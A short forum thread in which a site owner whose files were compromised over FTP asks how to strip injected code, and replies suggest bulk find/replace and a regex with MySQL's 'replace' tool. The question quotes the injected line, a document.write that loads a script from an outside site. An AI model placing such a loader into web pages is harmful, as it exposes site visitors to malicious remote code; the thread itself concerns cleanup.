Hello everyone, I had my site attacked through ftp today (I blocked it now), and some code injected into html, javascript, and php files. Could you please tell me how to remove this code? Is there a tool that does this automatically? The code looks like this: /*8876fed*/ document.write('<script type="text/javascript" src="http://www.nilgeor.de/gallery/hasdgf.php?id=981249768"></script>'); /*8876fed*/ the numbers are not consistent, and change in each file. Thanks!
Well, any decent text-editor will handle find/replace in multiple files - since you're not telling us which system you're on, nor your knowledge level, it's a bit hard to tell exactly what to do, but it goes something like this (if you prefer Windows): Open the site in an FTP / SFTP session, select all the files, open them in your favorite text-editor (not Notepad, but something proper, like Notepad++ or Sublime or similar) and do a search/find/replace and remove all the malicious code - if the text/content differs, you might wanna do a manual replace, but that can get tedious quite quickly, if there are many files, so you might wanna use regular expressions to search for the content you're looking for.
If you are running Linux and have MySQL installed, there is a nifty executeable already in your path called "replace". It is handy for this type of stuff. In its basic form, it works like this: replace 'search-text' 'replace-text' -- files.php You can do it with multiple files: replace 'search-text' 'replace-text' -- *.php will replace the search text with the replace text in all php files in the directory. You can also use */*.php. It also uses regular expressions. Please first try this on a test file before you try it en mass: replace 'document.write(\'<script type=\"text/javascript\" src=http://www.nilgeor.de/gallery/.+></script>\');' '' -- testfile.php That will at least remove the javascript portion of it. You can probably figure out the rest from there (the .+ is a wildcard)